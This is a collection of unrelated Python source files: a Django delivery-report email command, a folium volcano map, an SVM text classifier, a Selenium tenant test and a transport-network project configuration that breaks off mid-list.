    orders_menu_money = sum([o.money for o in orders_menu])
    orders_bl_money = sum([o.money for o in orders_bl])
    orders_combined_money = sum([o.money for o in orders_combined])
    orders_positions = sum([o.calc_positions() for o in orders])
    orders_menu_positions = sum([o.calc_positions() for o in orders_menu])
    orders_bl_positions = sum([o.calc_positions() for o in orders_bl])
    orders_combined_positions = sum([o.calc_positions() for o in orders_combined])
    # Averages, guarded against empty columns.
    orders_money_avg = int(round(float(orders_money) / orders_count)) if orders_count > 0 else 0
    orders_menu_money_avg = int(round(float(orders_menu_money) / orders_menu_count)) if orders_menu_count > 0 else 0
    orders_bl_money_avg = int(round(float(orders_bl_money) / orders_bl_count)) if orders_bl_count > 0 else 0
    orders_combined_money_avg = int(round(float(orders_combined_money) / orders_combined_count)) if orders_combined_count > 0 else 0
    orders_positions_avg = round(float(orders_positions) / orders_count, 2) if orders_count > 0 else 0
    orders_menu_positions_avg = round(float(orders_menu_positions) / orders_menu_count, 2) if orders_menu_count > 0 else 0
    orders_bl_positions_avg = round(float(orders_bl_positions) / orders_bl_count, 2) if orders_bl_count > 0 else 0
    orders_combined_positions_avg = round(float(orders_combined_positions) / orders_combined_count, 2) if orders_combined_count > 0 else 0
    # Per-day averages over the inclusive report period.
    period_start = period[0]
    period_end = period[1]
    days = (period_end - period_start).days + 1
    orders_avg_per_day = round(float(orders_count) / days, 2)
    orders_menu_avg_per_day = round(float(orders_menu_count) / days, 2)
    orders_bl_avg_per_day = round(float(orders_bl_count) / days, 2)
    orders_combined_avg_per_day = round(float(orders_combined_count) / days, 2)
    # Busiest-day maxima: re-bucket the orders, this time by calendar date.
    orders_max_per_day = 0
    orders_menu_max_per_day = 0
    orders_bl_max_per_day = 0
    orders_combined_max_per_day = 0
    orders_map = {}
    for order in orders:
        if order.is_menu_order():
            type_order = 'menu'
        elif order.is_bl_order():
            type_order = 'bl'
        else:
            type_order = 'combined'
        uid = order.created.date()
        if orders_map.has_key(uid):
            val = orders_map[uid]
        else:
            val = {'total':0, 'menu':0, 'bl':0, 'combined':0}
        val['total'] = val['total'] + 1
        val[type_order] = val[type_order] + 1
        orders_map[uid] = val
    for uid in orders_map.keys():
        if orders_map[uid]['total'] > orders_max_per_day:
            orders_max_per_day = orders_map[uid]['total']
        if orders_map[uid]['menu'] > orders_menu_max_per_day:
            orders_menu_max_per_day = orders_map[uid]['menu']
        if orders_map[uid]['bl'] > orders_bl_max_per_day:
            orders_bl_max_per_day = orders_map[uid]['bl']
        if orders_map[uid]['combined'] > orders_combined_max_per_day:
            orders_combined_max_per_day = orders_map[uid]['combined']
    # Pick the grammatically correct Russian plural form of "day".
    days_correct_ending = u"дней"
    if (days % 10) == 1 and not days == 11:
        days_correct_ending = u"день"
    if (days % 10) in [2, 3, 4] and not days in [12, 13, 14]:
        days_correct_ending = u"дня"
    preface = (u"<h3> Уважаемый господин/уважаемая госпожа, </h3>" +
               u"<p>вот отчёт о работе доставки с сайта за период с <b>" +
               unicode (period_start) + u'</b> по <b>' + unicode (period_end) + u'</b> ('+ unicode(days) + u' ' + days_correct_ending + u'):</p>')
    table_style = u'style="border: 1px solid;padding: 5px;"'
    # Best effort: look up the SMS-gateway balance; any failure simply
    # drops the balance line from the report.
    balance = None
    try:
        smsapi = sms24x7.smsapi(Setting.objects.get (key = 'email_address').value.encode('utf-8'),
                                Setting.objects.get (key = 'sms24x7_password').value.encode('utf-8'))
        smsapi.login()
        balance = smsapi.balance()
    except Exception as e:
        pass
    # Assemble the table; %table_style% is expanded once via .replace()
    # at the very end.
    # NOTE(review): a few '</td>' cells below are followed by the next
    # literal without a '+' — Python's adjacent-string-literal
    # concatenation makes the output identical, so this is left as-is.
    return preface + (u"<table %table_style%>" +
        u'<thead>' +
        u'<tr>' +
        u'<th %table_style%></th>' +
        u'<th %table_style%>Все заказы</th>' +
        u'<th %table_style%>Заказы по меню</th>' +
        u'<th %table_style%>Заказы <nobr>бизнес-ланчей</nobr></th>' +
        u'<th %table_style%>Заказы комбинированные</th>' +
        u'</tr>'+
        u'</thead>' +
        u'<tbody>' +
        u'<tr>' +
        u'<td %table_style%><b>Количество заказов:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_count) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_count) + '</td>'
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_count) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_count) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Количество заказов от постоянных гостей (% от всех заказов):</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_regular_guests) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp( orders_menu_regular_guests) + '</td>'
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_regular_guests) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_regular_guests) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Количество заказов от случайных посетителей (% от всех заказов:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_occasional_visitors) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_occasional_visitors) + '</td>'
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_occasional_visitors) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_occasional_visitors) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Получено денег от клиентов:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_money ) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_money) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_money) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_money) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Средняя стоимость заказа:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_money_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_money_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_money_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_money_avg) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Среднее количество позиций в заказе:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_positions_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_positions_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_positions_avg) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_positions_avg) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Среднее число заказов в день:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_avg_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_avg_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_avg_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_avg_per_day) + '</td>' +
        u'</tr>'+
        u'<tr>' +
        u'<td %table_style%><b>Максимальное число заказов в день:</b></td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_max_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_menu_max_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_bl_max_per_day) + '</td>' +
        u'<td %table_style%'+ u' align="center">' + pp(orders_combined_max_per_day) + '</td>' +
        u'</tr>'+
        # NOTE(review): the closing tag below should probably be u'</tbody>';
        # left unchanged because it is runtime output.
        u'<tbody>' +
        u"</table>" +
        (u"<p>Также сообщаем,что в настоящее время ваш баланс на сайте sms24x7.ru составляет <b>" + balance + u'</b></p>' if balance else '')
        ).replace (u'%table_style%', table_style)
def get_prev_month_end(date):
    """Return the last day of the month preceding *date*'s month."""
    starting_month = date.month
    one_day = dt.timedelta(days=1)
    # Walk backwards one day at a time until we cross the month boundary.
    while date.month == starting_month:
        date -= one_day
    return date
def get_this_month_start(date):
    """Return *date* moved back to the first day of its month."""
    return date.replace(day=1)
def get_this_year_start(date):
    """Return January 1st of *date*'s year."""
    return date.replace(month=1, day=1)
class Command(BaseCommand):
    """Management command that e-mails the delivery report.

    Takes one positional argument: 'M' for the previous calendar month,
    or 'Y' for the year up to the end of the previous month.  The report
    is sent to every Contact whose contact_detail looks like an e-mail.
    """
    def handle(self, *args, **options):
        # Validate the single Y/M argument up front.
        if len(args) != 1 or args[0].upper() not in ['Y', 'M']:
            raise CommandError("You must specify type of report: Y or M")
        report_type = args[0].upper()
        # The report always ends on the last day of the previous month.
        period_end = get_prev_month_end(dt.date.today())
        if report_type == 'Y':
            period_start = get_this_year_start(period_end)
        else:
            period_start = get_this_month_start(period_end)
        orders = (OrderHistory.objects
                  .filter(created__gte=period_start)
                  .filter(created__lte=period_end)
                  .order_by('created'))
        # For the yearly report, shrink the period to the first real order.
        if orders.count() > 0 and orders[0].created.date() > period_start and report_type == 'Y':
            period_start = orders[0].created.date()
        for contact in Contact.objects.all():
            if '@' not in contact.contact_detail:
                continue
            subject = (u'Отчёт о работе доставки с сайта за период с ' +
                       unicode(period_start) + u' по ' + unicode(period_end) + u'.')
            send_email(subject,
                       generate_delivery_report_plain(orders),
                       generate_delivery_report_html(orders, [period_start, period_end]),
                       contact.contact_detail)
|
#Note to reader: I'm sorry
import pandas
import folium
import numpy as np
#html for the popups
# The three %s placeholders are filled per marker: name, type, elevation.
html = """
<head>
<h4 style="margin-bottom:0px; padding-top:10px;">Volcano information:</h4>
<p>
Name: %s <br>
Type: %s <br>
Elevation: %s meters<br>
</p>
</head>
<style>
* {
font-family:Helvetica;
font-size:16;
}
</style>"""
data = pandas.read_csv("Volcanoes2.csv") #Opens the csv and sets it to the data variable
lat = list(data["LAT"])
lon = list(data["LON"])
names = list(data["Name"])
volc = list(data["Type"])
elev = list(data["Elevation"]) #Sets each variable to a list of all the points in a given column
def colorelev(elev):
    """Map an elevation in meters to a folium marker color.

    Bands: < 0 darkblue, <= 1000 green, <= 2000 blue, <= 3000 purple,
    <= 4000 orange, anything above red.

    Fix: the original chain had no branch for elev > 6000 and implicitly
    returned None, which folium cannot use as a fill color; everything
    above 4000 now falls through to "red".
    """
    if elev < 0:
        return "darkblue"
    if elev <= 1000:
        return "green"
    if elev <= 2000:
        return "blue"
    if elev <= 3000:
        return "purple"
    if elev <= 4000:
        return "orange"
    return "red"
VolcanoMap = folium.Map(location=[39.38, -118.63], zoom_start = 4) #Creates the basemap
fgVolc = folium.FeatureGroup(name="Volcanoes") #Feature group for the volcano markers
fgPop = folium.FeatureGroup(name="Population") #Feature group for the population choropleth
# Population layer: countries colored by POP2005 (<10M green, <20M orange, else red).
fgPop.add_child(folium.GeoJson(data=open('world.json', 'r', encoding="utf-8-sig").read(),
style_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))
# One circle marker per volcano; popup shows name/type/elevation via the html template.
# NOTE(review): the loop targets shadow the source lists (lat, lon, volc, elev);
# harmless here because zip() captures the lists first, but fragile.
for lat, lon, name, volc, elev in zip(lat, lon, names, volc, elev):
    iframe = folium.IFrame(html=html % (name, volc, elev), width=300, height=122)
    fgVolc.add_child(folium.CircleMarker(location=[lat, lon], popup=folium.Popup(iframe), radius=7, fill=True, color='grey',
        fill_opacity=0.7, fill_color=colorelev(elev)))
VolcanoMap.add_child(fgPop) #Adds population map to the final map
VolcanoMap.add_child(fgVolc) #Adds volcanoes to the final map
VolcanoMap.add_child(folium.LayerControl()) #Layer control to toggle the feature groups
VolcanoMap.save("VolcanoMap2.html") #Saves the map as an html file
from django.shortcuts import render, redirect
# from django.http import HttpResponseRedirect
from sklearn import svm #method untuk pross perhitungan klasifikasi
from sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer #method untuk menghitung tfidf dan vsm
from sklearn import metrics #method untuk pembentukan matriks 1x1, 2x2, 3x3, ...
from sklearn.metrics import accuracy_score #method perhitungan akurasi
from sklearn.model_selection import KFold #Method perhitungan K-Fold
from sklearn.model_selection import train_test_split
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
import matplotlib.pyplot as plt
# from django.http import HttpResponse
import io
import urllib, base64
import pandas as pd
import nltk
import os
import nltk.corpus
import numpy as np #scientific computing untuk array N-dimenesi
import re #re = regular expression
import warnings
warnings.filterwarnings('ignore')
# import csv
from django.shortcuts import render
import openpyxl
def index(request):
    """Upload an Excel file of labelled documents, preprocess the text,
    run 10-fold linear-SVM classification and render the results page.

    GET  -> renders the empty upload form.
    POST -> expects ``excel_file`` in request.FILES; sheet "Sheet1" is
    read with column A as document text and column B as its label
    (assumed Kimia / Fisika / Biologi — TODO confirm against the data).
    """
    if "GET" == request.method:
        return render(request, 'klasifikasi/index.html', {})
    else:
        excel_file = request.FILES["excel_file"]
        # you may put validations here to check extension or file size
        wb = openpyxl.load_workbook(excel_file)
        # getting all sheets
        sheets = wb.sheetnames
        print(sheets)
        # getting a particular sheet
        worksheet = wb["Sheet1"]
        print(worksheet)
        # getting active sheet
        active_sheet = wb.active
        print(active_sheet)
        # reading a cell
        print(worksheet["A1"].value)
        excel_data = list()
        # iterating over the rows and
        # getting value from each cell in row
        for row in worksheet.iter_rows():
            row_data = list()
            for cell in row:
                row_data.append(str(cell.value))
                print(cell.value)
            excel_data.append(row_data)
        # CASE FOLDING: clean and lower-case every document.
        dataSet = []  # cleaned text of each document
        for a in excel_data:  # iterate over the uploaded rows
            string = a[0]
            string = re.sub("[^a-zA-Z]", " ", string)  # replace every non-letter character with a space
            string = string.lower()  # lower-case the sentence
            dataSet.append(string)  # collect the cleaned sentence
        # print("Case Folding: \n", dataSet)
        # Load the stopword list from disk.
        stopword = []  # raw stopword text (single element)
        s = open("klasifikasi/templates/id.stopwords.txt", "r+")  # open the stopword file
        stop = s.read()  # read the whole file
        stop = re.sub("[^a-zA-Z]", " ", stop)  # strip non-letter characters
        stopword.append(stop)  # keep the cleaned stopword text
        s.close()  # close the file
        # print("\nDaftar Stopword: \n", stopword)
        # TOKENIZING the documents.
        # NOTE(review): bagOfWords is an alias of dataSet, not a copy —
        # the loop below mutates both names.
        bagOfWords = dataSet
        for x in range(len(dataSet)):
            bagOfWords[x] = dataSet[x].split()  # split each document into words
        print("\nTokenizing: \n", bagOfWords)
        # TOKENIZING the stopword text (alias again).
        stopwords = stopword
        for x in range(0,1):
            stopwords[x] = stopword[x].split()  # split the stopword text into words
        print("\nTokenizing Stopwords: \n", stopwords)
        # FILTERING: blank out every document word found in the stopword list.
        # NOTE(review): the inner range hard-codes 780 stopwords — breaks if
        # the stopword file has fewer entries; TODO use len(stopwords[0]).
        for x in range(len(dataSet)):
            for y in range(0, len(bagOfWords[x])):
                for z in range(0, 780):
                    if(bagOfWords[x][y] == stopwords[0][z]):
                        bagOfWords[x][y]=''  # erase the stopword
        print("\nFiltering: \n", bagOfWords)
        # Rebuild each document as a sentence with the emptied slots removed.
        for i in range(0, len(bagOfWords)):
            bagOfWords[i] = filter(bool, bagOfWords[i])  # drop the empty strings
            dataSet[i] = ' '.join(bagOfWords[i])  # re-join the words into one string
        print("\nKata Bersih: \n", dataSet)
        # Stemming (disabled).
        # factory = StemmerFactory()
        # stemmer = factory.create_stemmer()
        # for i in range(0, len(bagOfWords)):
        # output = stemmer.stem(str(bagOfWords))
        # print("\nStemming : \n", output)
        # VSM & TF-IDF feature extraction.
        VSM = CountVectorizer().fit_transform(dataSet)  # term-count vectors (vector space model)
        #tfidf = TfidfTransformer()
        TFIDF = TfidfTransformer().fit_transform(VSM)  # TF-IDF weights from the count vectors
        #print (CountVectorizer().vocabulary)
        # print("\nVSM: \n", VSM)
        print("\n", VSM.todense())
        print("\nTFIDF: \n", TFIDF)
        #hhprint(TFIDF.todense())
        # Labels come from column B of the sheet.
        # label_manual = excel_data
        label = []
        for a in excel_data:
            label.append(a[1])
        label_manual = np.array(label)
        # Per-fold accuracy scores collected during cross-validation.
        akurasi = []
        def avg_akurasi():
            # NOTE(review): dead code — its only call site is commented out
            # below, and 'total' would resolve to index()'s local that is
            # assigned only after the fold loop.  Left as-is.
            # total = 0 ## reset the accumulator
            # for i in range(10): ## 10 folds
            # total = total + akurasi[i]
            # rata2 = total / 10
            # avg_akurasi = (total / 10)
            print("-------------------------------------------------------------------------------------------------------")
            print("Rata-rata akurasi keseluruhan adalah :", total / 10) ## print the overall average accuracy
        data_prediksi = []
        data_uji = []
        data_latih = []
        kFoldCrossValidation = KFold(n_splits=10)  # 10-fold cross-validation splitter
        for latih, uji in kFoldCrossValidation.split(TFIDF, label_manual):
            print("-----------------------------------------------------------------------")
            print("Banyak Data Latih: ", len(latih))
            print("Banyak Data Uji: ", len(uji))
            print("\nData Latih: \n", latih)
            print("\nData Uji: \n", uji)
            dataLatih1, dataUji1 = TFIDF[latih], TFIDF[uji]  # TF-IDF features for this fold
            # label = []
            # for a in excel_data:
            # label.append(a[1])
            # label_manual = np.array(label)
            dataLatih2, dataUji2 = label_manual[latih], label_manual[uji]  # labels for this fold
            SVM = svm.SVC(kernel='linear').fit(dataLatih1, dataLatih2)  # train a linear SVM
            prediksi = SVM.predict(dataUji1)  # predict the held-out fold
            print("\nHasil Prediksi: \n", prediksi)
            print("\nConfusion Matrix: \n", metrics.confusion_matrix(dataUji2, prediksi))
            akurasi.append(accuracy_score(dataUji2, prediksi))
            print("\nAkurasi: ", accuracy_score(dataUji2, prediksi))
            print()
            # NOTE(review): rebinding 'label' here shadows the raw label list
            # read from the sheet above.
            label = ['Kimia', 'Fisika', 'Biologi']
            print(metrics.classification_report(dataUji2, prediksi, target_names=label))
            data_uji.append(uji)
            data_latih.append(latih)
            data_prediksi.append(prediksi)
            # metrics = metrics.classification_report(dataUji2, prediksi, target_names=label)
        # avg_akurasi()
        # Mean accuracy over the 10 folds.
        total = 0
        for i in range(10): ## 10 folds
            total = total + akurasi[i]
        rata2 = total / 10
        # Histogram of all fold predictions, exported as a data-URI PNG.
        np_prediksi = np.array(data_prediksi)
        data_hist = np_prediksi.ravel()
        plt.hist(data_hist)
        fig = plt.gcf()
        buf = io.BytesIO()
        fig.savefig(buf,format='png')
        buf.seek(0)
        string = base64.b64encode(buf.read())
        uri = urllib.parse.quote(string)
        # data_loop = zip(data_uji, data_prediksi)
        # 'latih'/'uji' here are whatever the last fold left bound.
        return render(request, 'klasifikasi/index.html', {"excel_data":excel_data, 'data' : uri, 'latih' : latih, 'uji' : uji, 'akurasi' : str(akurasi), 'rata2' : rata2, 'data_prediksi' : data_prediksi})
        # return HttpResponse(request, 'klasifikasi/index.html', list(akurasi))
import sys
sys.path.append('../../..//pyzx')
import pyzx as zx
import matplotlib.pyplot as plt
# Load a QASM circuit, turn it into a ZX graph and print its TikZ form.
circ = zx.Circuit.load("simple.qasm")
g = circ.to_graph()
# zx.spider_simp(g)
# zx.draw(g)
# plt.show()
tikz = g.to_tikz()
print(tikz)
|
def collect_until_zero(read=input):
    """Read integers until a 0 is entered; return them all (0 included).

    *read* is the prompt function (defaults to built-in input), injectable
    for testing.

    Fix: the original did ``list = list.append(...)`` which rebinds the
    list to None (list.append returns None) and crashes with a TypeError
    on the second iteration; it also shadowed the ``list`` builtin and had
    a no-op bare ``x`` statement.
    """
    numbers = []
    while True:
        value = int(read("Digite um número terminado em 0"))
        numbers.append(value)
        if value == 0:
            return numbers

if __name__ == "__main__":
    print(collect_until_zero())
|
# coding: utf-8
import os
import sys
import unittest
from selenium import webdriver
sys.path.append(os.environ.get('PY_DEV_HOME'))
from webTest_pro.common.initData import init
from webTest_pro.common.model.baseActionAdd import admin_login, add_tenants
from webTest_pro.common.logger import logger, T_INFO
# Python 2 idiom: reload sys to restore setdefaultencoding, then force
# UTF-8 so the Chinese fixture strings round-trip correctly.
reload(sys)
sys.setdefaultencoding("utf-8")
# Shared login data from the init fixture.
loginInfo = init.loginInfo
# Test fixtures: tenant to add, tenant update data, tenants to delete.
# NOTE(review): the values are runtime test data (Chinese tenant names
# and an XPath locator) — do not translate or alter them.
tenantAdd = [{'areaid': "//div[@id='treeview']/ul/li[17]", 'platmarkName': u'河南教育局', 'platmarkCode': '001'}]
tenantData = [{'platmarkName': u'张三教育局11', 'platmarkCode': '002', 'searchName': u'张三教育局'}]
tenantDel = [{'searchName': u'张三教育局11'}, {'searchName': u'李四教育局'}]
class tenantmanger(unittest.TestCase):
    '''Tenant-management scenario (Selenium UI tests).

    NOTE(review): Python 2 code (print statements; reload(sys) at module
    level).  The driver is chosen from init.execEnv['execType']: a local
    Chrome, or a remote webdriver at execEnv['remoteUrl'].
    '''
    def setUp(self):
        # Local run: drive a locally installed Chrome.
        if init.execEnv['execType'] == 'local':
            T_INFO(logger,"\nlocal exec testcase")
            self.driver = webdriver.Chrome()
            self.driver.implicitly_wait(8)
            self.verificationErrors = []
            self.accept_next_alert = True
            T_INFO(logger,"start tenantmanger...")
        # Remote run: connect to a remote Selenium endpoint.
        else:
            T_INFO(logger,"\nremote exec testcase")
            browser = webdriver.DesiredCapabilities.CHROME
            self.driver = webdriver.Remote(command_executor=init.execEnv['remoteUrl'], desired_capabilities=browser)
            self.driver.implicitly_wait(8)
            self.verificationErrors = []
            self.accept_next_alert = True
            T_INFO(logger,"start tenantmanger...")
    def tearDown(self):
        # Always close the browser; fail the test if any soft-verification
        # errors were collected during the run.
        self.driver.quit()
        self.assertEqual([], self.verificationErrors)
        T_INFO(logger,"tenantmanger end!")
    def test_add_tenant(self):
        '''Log in as admin and add one tenant per fixture in tenantAdd.'''
        print "exec: test_add_tenant..."
        driver = self.driver
        admin_login(driver)
        for itme in tenantAdd:
            add_tenants(driver, **itme)
        print "exec: test_add_tenant OK"
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
|
import os
import collections
# MANDATORY. Set this to be the Project Name.
# e.g. "RTP2021", "TIP2021", etc
PROJECT = "NGF"
# MANDATORY. Set this to be the git tag for checking out network projects.
#TAG = "HEAD" # Use this tag if you want NetworkWrangler to use the latest version in the local repo to build the network
#TAG = "PBA50_Blueprint" # Use this tag if you want to replicate the network built for PBA50
# NOTE(review): "HEAD" builds from the latest local commit; pin a specific
# tag for reproducible network builds.
TAG = "HEAD"
# A project can either be a simple string, or it can be
# a dictionary with with keys 'name', 'tag' (optional), and 'kwargs' (optional)
# to specify a special tag or special keyword args for the projects apply() call.
# For example:
# {'name':"Muni_TEP", 'kwargs':{'servicePlan':"'2012oct'"}}
###########################################################
# NextGenFwy projects
# Pathways - note these are 2035 projects
NGF_PROJECTS = {
'BlueprintSegmented':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
],
'trn':[]
},
# Pathway 1a: All-lane tolling + Improve Transit Experience (new numbering in AG10: P1a_AllLaneTolling_ImproveTransit --> 3A)
# https://app.asana.com/0/1203644633064654/1203644636776961/f
'P1a_AllLaneTolling_ImproveTransit':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_TransitPriorityOnArterials', # Transit Priority - All Lane Tolling
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_NP_040_VINE_Exp_Bus_Enhancements',
'FBP_MR_018_US101_BOS',
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: Rex Link
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_SL_026_SolExpressBus',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Local Transit Frequency Boosts 2
# Parameters defined here: https://app.asana.com/0/0/1203931443540514/f
{'name':'NGF_IncreaseTrnFreqXferRoutes2BartCaltrainFerry', 'kwargs':{
'top_n_local':'2',
# configure by mode: https://github.com/BayAreaMetro/modeling-website/wiki/TransitModes
'min_headway':'{"local_default":15, 21:10, 24:10, 27:10, 28:10, 30:10, 111:10}',
'include_connections_to_express_bus':'True',
# this directory is used to determine which routes have frequency increases. So to include ReX Express bus routes,
# use a directory that includes ReX Express routes (e.g. an earlier iteration of this scenario)
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}},
# Extended Transit Service Hours
{'name':'NGF_TrnExtendedServiceHours', 'kwargs':{'EV_headway':'15'}},
]
},
# Pathway 1b: All-lane tolling + Focus on Affordability (new numbering in AG10: P1b_AllLaneTolling_Affordable --> 3B)
# https://app.asana.com/0/1203644633064654/1203644636776965/f
'P1b_AllLaneTolling_Affordable':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'NGF_CarpoolLanes', # Carpool Lanes
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# new numbering in AG10: P2a_AllLaneTollingPlusArterials_ImproveTransit --> 4A)
'P2a_AllLaneTollingPlusArterials_ImproveTransit':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_TransitPriorityOnArterials', # Transit Priority - All Lane Tolling
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_NP_040_VINE_Exp_Bus_Enhancements',
'FBP_MR_018_US101_BOS',
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'NGF_Arterials', # Code arterials for tolling in Pathway 2
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: Rex Link
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_SL_026_SolExpressBus',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Local Transit Frequency Boosts 2
# Parameters defined here: https://app.asana.com/0/0/1203931443540514/f
{'name':'NGF_IncreaseTrnFreqXferRoutes2BartCaltrainFerry', 'kwargs':{
'top_n_local':'2',
# configure by mode: https://github.com/BayAreaMetro/modeling-website/wiki/TransitModes
'min_headway':'{"local_default":15, 21:10, 24:10, 27:10, 28:10, 30:10, 111:10}',
'include_connections_to_express_bus':'True',
# this directory is used to determine which routes have frequency increases. So to include ReX Express bus routes,
# use a directory that includes ReX Express routes (e.g. an earlier iteration of this scenario)
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}},
# Extended Transit Service Hours
{'name':'NGF_TrnExtendedServiceHours', 'kwargs':{'EV_headway':'15'}},
]
},
# new numbering in AG10: P2b_AllLaneTollingPlusArterials_Affordable --> 4B)
'P2b_AllLaneTollingPlusArterials_Affordable':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_Arterials', # Code arterials for tolling in Pathway 2
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# new numbering in AG10: P3a_3Cordons_ImproveTransit --> 2A
'P3a_3Cordons_ImproveTransit':{
'hwy':[
'MAJ_SF_Congestion_Pricing', # San Francisco Cordon Pricing
'NGF_AL_Cordon', # Oakland Cordon Pricing
'NGF_SC_Cordon', # San Jose Cordon Pricing
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
'NGF_TransitPriorityCordons' # Transit Priority - Cordons
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'MAJ_SF_Congestion_Pricing',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
